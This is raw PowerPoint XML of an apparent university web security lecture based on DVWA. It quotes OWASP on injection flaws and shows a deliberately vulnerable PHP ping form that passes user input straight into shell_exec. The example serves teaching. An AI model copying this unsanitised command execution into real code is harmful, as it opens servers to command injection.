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6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2"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId33"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="289" r:id="rId2"/>
    <p:sldId id="546" r:id="rId3"/>
    <p:sldId id="545" r:id="rId4"/>
    <p:sldId id="544" r:id="rId5"/>
    <p:sldId id="547" r:id="rId6"/>
    <p:sldId id="548" r:id="rId7"/>
    <p:sldId id="549" r:id="rId8"/>
    <p:sldId id="550" r:id="rId9"/>
    <p:sldId id="407" r:id="rId10"/>
    <p:sldId id="551" r:id="rId11"/>
    <p:sldId id="433" r:id="rId12"/>
    <p:sldId id="434" r:id="rId13"/>
    <p:sldId id="437" r:id="rId14"/>
    <p:sldId id="438" r:id="rId15"/>
    <p:sldId id="474" r:id="rId16"/>
    <p:sldId id="552" r:id="rId17"/>
    <p:sldId id="554" r:id="rId18"/>
    <p:sldId id="458" r:id="rId19"/>
    <p:sldId id="443" r:id="rId20"/>
    <p:sldId id="444" r:id="rId21"/>
    <p:sldId id="442" r:id="rId22"/>
    <p:sldId id="445" r:id="rId23"/>
    <p:sldId id="446" r:id="rId24"/>
    <p:sldId id="448" r:id="rId25"/>
    <p:sldId id="453" r:id="rId26"/>
    <p:sldId id="454" r:id="rId27"/>
    <p:sldId id="455" r:id="rId28"/>
    <p:sldId id="452" r:id="rId29"/>
    <p:sldId id="461" r:id="rId30"/>
    <p:sldId id="460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orient="horz" pos="1440">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" pos="3840">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" pos="19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verick Woo" initials="ma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0000FF"/>
    <a:srgbClr val="717BFF"/>
    <a:srgbClr val="3F5842"/>
    <a:srgbClr val="595A5A"/>
    <a:srgbClr val="A32D1E"/>
    <a:srgbClr val="FFFFFF"/>
    <a:srgbClr val="866C49"/>
    <a:srgbClr val="79463D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03" autoAdjust="0"/>
    <p:restoredTop sz="86098" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="68" d="100"/>
          <a:sy n="68" d="100"/>
        </p:scale>
        <p:origin x="2050" y="67"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2880"/>
        <p:guide orient="horz" pos="1440"/>
        <p:guide pos="3840"/>
        <p:guide pos="19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59" d="100"/>
        <a:sy n="59" d="100"/>
      </p:scale>
      <p:origin x="0" y="-40027"/>
    </p:cViewPr>
  </p:sorterViewPr>
  <p:notesViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="110" d="100"/>
          <a:sy n="110" d="100"/>
        </p:scale>
        <p:origin x="-4040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81C90-955A-E944-AB32-466E55900D6A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21-Dec-23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F8D97-067E-974E-BD5D-FA8C0988A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0919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9EA11A-7C1A-F544-A99B-661F38A45889}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21-Dec-23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45A8A3-9FBB-431D-AAA8-BEEA360F5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664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0133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62B3FC-2135-4E26-9C94-50F8F1639012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04" y="4342789"/>
            <a:ext cx="5485794" cy="4115106"/>
          </a:xfrm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0861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="http://thenounproject.com/noun/database/#icon-No15201" target="_blank"&gt;Database&lt;/a&gt;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ceesdevries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" target="_blank"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Cees</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Vries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/a&gt; from The Noun Project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="http://thenounproject.com/noun/user/#icon-No2727" target="_blank"&gt;User&lt;/a&gt;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="http://thenounproject.com/Luis" target="_blank"&gt;Luis Prado&lt;/a&gt; from The Noun Project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884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="http://thenounproject.com/noun/evil/#icon-No14759" target="_blank"&gt;Evil&lt;/a&gt;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acondiff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" target="_blank"&gt;Austin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Condiff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/a&gt; from The Noun Project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-This is the closest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> to our threat model when we discussed Control Flow Hijacking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168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="http://thenounproject.com/noun/evil/#icon-No14759" target="_blank"&gt;Evil&lt;/a&gt;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acondiff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" target="_blank"&gt;Austin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Condiff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/a&gt; from The Noun Project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6108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="http://thenounproject.com/noun/evil/#icon-No14759" target="_blank"&gt;Evil&lt;/a&gt;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acondiff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" target="_blank"&gt;Austin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Condiff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/a&gt; from The Noun Project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="http://thenounproject.com/noun/happy/#icon-No3060" target="_blank"&gt;Happy&lt;/a&gt;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tobiasfabian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" target="_blank"&gt;Tobias F. Wolf&lt;/a&gt; from The Noun Project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7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="http://thenounproject.com/noun/evil/#icon-No14759" target="_blank"&gt;Evil&lt;/a&gt;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acondiff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" target="_blank"&gt;Austin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Condiff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/a&gt; from The Noun Project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="http://thenounproject.com/noun/happy/#icon-No3060" target="_blank"&gt;Happy&lt;/a&gt;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tobiasfabian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" target="_blank"&gt;Tobias F. Wolf&lt;/a&gt; from The Noun Project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672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="http://thenounproject.com/noun/evil/#icon-No14759" target="_blank"&gt;Evil&lt;/a&gt;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acondiff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" target="_blank"&gt;Austin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Condiff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/a&gt; from The Noun Project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="http://thenounproject.com/noun/happy/#icon-No3060" target="_blank"&gt;Happy&lt;/a&gt;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tobiasfabian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" target="_blank"&gt;Tobias F. Wolf&lt;/a&gt; from The Noun Project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2034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="http://thenounproject.com/noun/database/#icon-No15201" target="_blank"&gt;Database&lt;/a&gt;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ceesdevries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" target="_blank"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Cees</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Vries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/a&gt; from The Noun Project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="http://thenounproject.com/noun/user/#icon-No2727" target="_blank"&gt;User&lt;/a&gt;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="http://thenounproject.com/Luis" target="_blank"&gt;Luis Prado&lt;/a&gt; from The Noun Project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164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="http://thenounproject.com/noun/database/#icon-No15201" target="_blank"&gt;Database&lt;/a&gt;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ceesdevries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" target="_blank"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Cees</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Vries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;/a&gt; from The Noun Project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="http://thenounproject.com/noun/user/#icon-No2727" target="_blank"&gt;User&lt;/a&gt;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="http://thenounproject.com/Luis" target="_blank"&gt;Luis Prado&lt;/a&gt; from The Noun Project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061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tags" Target="../tags/tag55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0.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag59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5.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag6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9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+mj-lt"/>
                <a:cs typeface="Calibri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 i="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt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FA2AE38F-F663-7942-B079-5005BA0BDF98}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21-Dec-23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7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89C206F0-989F-EB47-9ADF-69E14BBCA2C4}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21-Dec-23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236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25B7867C-8937-A54F-BAEE-445098FFEF8A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21-Dec-23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715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E2076C5-CD0F-8E46-ABC4-9EABE219C92B}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21-Dec-23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644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A5379D80-A8B0-C443-BFE8-6E9F37773209}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21-Dec-23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15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3034508"/>
            <a:ext cx="6951274" cy="1308892"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4000" b="0" i="0" cap="none">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Calibri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92724" y="1524000"/>
            <a:ext cx="6951274" cy="1500187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" anchor="b" anchorCtr="0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B6757E5B-C539-4546-894F-EB0786D60B50}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21-Dec-23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264380" y="2013343"/>
            <a:ext cx="6951274" cy="753670"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="4000" b="0" i="0" cap="none">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Section Header 2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264380" y="2919413"/>
            <a:ext cx="6951274" cy="1500187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t"/>
          <a:lstStyle>
            <a:lvl1pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"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FF059461-0FFD-CF49-A98A-09B0AEA4D5FF}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21-Dec-23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498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447800"/>
            <a:ext cx="4038600" cy="4678363"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr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8200" y="1447800"/>
            <a:ext cx="4038600" cy="4678363"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr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1CCEE-A76B-F34C-A05F-2F1994D60204}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>21-Dec-23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320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35113"/>
            <a:ext cx="4040188" cy="4460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" y="1981200"/>
            <a:ext cx="4040188" cy="41449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45025" y="1535113"/>
            <a:ext cx="4041775" cy="4460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1981200"/>
            <a:ext cx="4041775" cy="41449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21557A61-675D-5A4C-8099-956071C6A9AA}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21-Dec-23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85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FC88AAD4-BEBB-AE48-AF6A-5D0E05A49B41}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21-Dec-23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774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41EE10F8-3DB7-9B44-B7CC-65AF664A5F6D}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21-Dec-23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9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3008313" cy="1162050"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="48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575050" y="1435100"/>
            <a:ext cx="5111750" cy="46910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082D1B10-278B-5146-B66A-B6028DFB770B}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21-Dec-23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805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tags" Target="../tags/tag5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457200" y="1371600"/>
            <a:ext cx="8229600" cy="4754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5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{A271CCEE-A76B-F34C-A05F-2F1994D60204}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>21-Dec-23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5"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri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6934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fld id="{B747839D-A323-47F3-909F-54849939962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604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0" i="0" kern="1200" spc="-50" normalizeH="0">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="Cambria"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="292100" indent="-2921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Calibri"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="635000" indent="-29210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Calibri"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="9144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Calibri"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1143000" indent="-228600" algn="l" defTabSz="457200" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buFont typeface="Arial"/>
        <a:buChar char="–"/>
        <a:tabLst/>
        <a:defRPr sz="2000" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="Calibri"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1320800" indent="-1778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gi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emf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emf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.e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98423" y="2035175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b="1" dirty="0"/>
              <a:t>Web Security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343400" y="3733800"/>
            <a:ext cx="31598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Jonathan Burket</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Carnegie Mellon University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4083" y="5380672"/>
            <a:ext cx="673120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Credits: Original Slides by David Brumley.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examples based on DVWA (http://www.dvwa.co.uk/)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Collin Jackson’s Web Security Course</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> http://caffeinept.blogspot.com/2012/01/dvwa-sql-injection.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Graphics from The Noun Project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2453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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injection flaws </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>occur when an application sends untrusted data to an interpreter.” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>--- OWASP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6492875"/>
            <a:ext cx="7021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https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>www.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>/Top_10_2010-A4-Insecure_Direct_Object_References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066800" y="2811572"/>
            <a:ext cx="6779172" cy="2979627"/>
            <a:chOff x="1066800" y="2811572"/>
            <a:chExt cx="6779172" cy="2979627"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Bent-Up Arrow 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1066800" y="2811572"/>
              <a:ext cx="2133600" cy="2133600"/>
            </a:xfrm>
            <a:prstGeom prst="bentUpArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 19581"/>
                <a:gd name="adj2" fmla="val 25000"/>
                <a:gd name="adj3" fmla="val 25000"/>
              </a:avLst>
            </a:prstGeom>
            <a:ln w="28575" cap="flat" cmpd="sng">
              <a:miter lim="800000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 anchor="ctr" anchorCtr="1">
              <a:no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2969172" y="3581400"/>
              <a:ext cx="4876800" cy="2209799"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575" cap="flat" cmpd="sng">
              <a:miter lim="800000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 anchor="ctr" anchorCtr="1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Like Buffer Overflow and Format String Vulnerabilities, A result of from </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>mixing data and code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22239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11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638800" y="1447800"/>
            <a:ext cx="2438400" cy="6096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Server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98358" y="1447800"/>
            <a:ext cx="2438400" cy="6096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Client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11" descr="Screen Shot 2012-07-02 at 11.42.5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5717" y="2743947"/>
            <a:ext cx="4051300" cy="13970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914400" y="533400"/>
            <a:ext cx="34034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sz="2400" dirty="0"/>
              <a:t>1. http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>site.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>/exec/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Elbow Connector 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4487779" y="-992271"/>
            <a:ext cx="12700" cy="4740442"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 1800000"/>
            </a:avLst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2123908" y="2133600"/>
            <a:ext cx="4740442" cy="698847"/>
            <a:chOff x="2123908" y="2965450"/>
            <a:chExt cx="4740442" cy="698847"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="17" name="Elbow Connector 16"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="4487779" y="601579"/>
              <a:ext cx="12700" cy="4740442"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 180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123908" y="3202632"/>
              <a:ext cx="18227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2. Send page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52400" y="4293275"/>
            <a:ext cx="66575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/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;h2&gt;Ping for FREE&lt;/h2&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;p&gt;Enter an IP address below:&lt;/p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;form name="ping" action="#" method="post"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;input type="text" name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>" size="30"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;input type="submit" value="submit" name="submit”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rounded Rectangular Callout 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6477000" y="4792720"/>
            <a:ext cx="2438400" cy="930160"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -72917"/>
              <a:gd name="adj2" fmla="val 24373"/>
              <a:gd name="adj3" fmla="val 16667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Input to form program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514600" y="5410200"/>
            <a:ext cx="1371600" cy="312680"/>
          </a:xfrm>
          <a:prstGeom prst="round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924800" y="1939620"/>
            <a:ext cx="651999" cy="65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0868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12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638800" y="1447800"/>
            <a:ext cx="2438400" cy="6096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Server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98358" y="1447800"/>
            <a:ext cx="2438400" cy="6096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Client</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Elbow Connector 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="4487779" y="-992271"/>
            <a:ext cx="12700" cy="4740442"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 1800000"/>
            </a:avLst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15" idx="3"/>
            <a:endCxn id="10" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="3954379" y="220579"/>
            <a:ext cx="685800" cy="435944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123908" y="2370782"/>
            <a:ext cx="1780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Send output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2400" y="4293275"/>
            <a:ext cx="66575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/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;h2&gt;Ping for FREE&lt;/h2&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;p&gt;Enter an IP address below:&lt;/p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;form name="ping" action="#" method="post"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;input type="text" name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>" size="30"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;input type="submit" value="submit" name="submit”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&lt;/form&gt;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514600" y="5410200"/>
            <a:ext cx="1371600" cy="312680"/>
          </a:xfrm>
          <a:prstGeom prst="round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5" name="Snip Single Corner Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4343400" y="2743200"/>
            <a:ext cx="4267200" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="snip1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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $t = $_REQUEST[‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>']; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> $o = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>shell_exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(‘ping –C 3’ . </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>$t)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> echo $o</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
